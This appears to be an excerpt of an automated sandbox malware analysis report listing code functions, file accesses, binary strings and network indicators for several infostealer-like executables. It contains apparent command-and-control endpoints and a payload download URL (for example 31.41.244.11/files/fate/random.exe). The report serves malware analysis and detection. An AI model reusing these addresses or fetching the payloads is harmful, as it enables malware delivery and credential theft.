                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,3_2_6C4D9EC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B3FF0 PK11_PrivDecryptPKCS1,3_2_6C4B3FF0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,3_2_6C4B9840
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,3_2_6C4B3850
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DDA40 SEC_PKCS7ContentIsEncrypted,3_2_6C4DDA40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,3_2_6C4B3560
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4AF050 PR_smprintf,SEC_CertNicknameConflict,strlen,realloc,memset,realloc,strlen,free,PR_smprintf,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PR_SetError,PR_GetCurrentThread,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,PK11_GenerateRandom,SECKEY_DestroyPrivateKey,PR_SetError,free,free,free,free,PK11_FindCertInSlot,PORT_NewArena_Util,free,PK11_ImportCert,PR_SetError,free,CERT_DestroyCertificate,PORT_FreeArena_Util,PR_GetCurrentThread,PORT_ArenaAlloc_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_GetCurrentThread,strlen,PR_SetError,PR_GetCurrentThread,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,PR_SetError,free,SECKEY_DestroyPrivateKey,SECKEY_DestroyEncryptedPrivateKeyInfo,PR_SetError,3_2_6C4AF050

                                    Phishing

                                    Source: Yara matchFile source: C:\Temp\.gif, type: DROPPED
                                    Source: Yara matchFile source: C:\Temp\5ZycQXqae.txt, type: DROPPED
                                    Source: Yara matchFile source: C:\Temp\3GEgnMlRi.txt, type: DROPPED
                                    Source: EdYEXasNiR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dll
                                    Source: Binary string: mozglue.pdbP source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: nss3.pdb@ source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, cbfb8a9c89.exe, 0000001D.00000000.2226147614.0000000000C32000.00000002.00000001.01000000.00000011.sdmp
                                    Source: Binary string: nss3.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: mozglue.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: 696689ce6d.exe, 0000002F.00000003.4293663574.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000000.2339203126.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp, 696689ce6d.exe, 0000002F.00000002.4903441825.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeDirectory queried: number of queries: 1001
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C585070 strlen,PR_SetError,strcpy,_mbsdec,strlen,_mbsinc,_mbsinc,FindFirstFileA,GetLastError,3_2_6C585070
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                                    Software Vulnerabilities

                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Source: chrome.exeMemory has grown: Private usage: 0MB later: 30MB

                                    Networking

                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: 568p2nk.exe.18.dr
                                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                                    Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46CC60 PR_Recv,3_2_6C46CC60
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206Local
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206LocalMicrosoft
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000001057000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://185.215.113.206c4becf79229cb002.phpcbbbb703d91fb637c662a9d77f85release
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196394890.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                                    Source: skotes.exe, 00000012.00000003.6196394890.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded%
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedS
                                    Source: skotes.exe, 00000012.00000003.2747659202.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/fate/random.exe
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                    Source: powershell.exe, 00000025.00000002.2363909554.00000000088A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microl
                                    Source: powershell.exe, 00000035.00000002.2495364634.0000017327714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft2
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                    Source: skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2822393394.000000000075F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                                    Source: powershell.exe, 0000001F.00000002.2281404457.0000000005B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2329195901.00000000061B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.00000173398E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.0000017339A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                    Source: powershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.00000000030AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.00000000030AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                                    Source: powershell.exe, 0000001F.00000002.2276089201.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.00000000052A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2276089201.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.0000017329871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 0000001F.00000002.2276089201.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.00000000052A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                    Source: powershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.00000000008D3000.00000040.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.00000000008D3000.00000040.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228408056.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: powershell.exe, 00000035.00000002.2538930366.0000017329871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
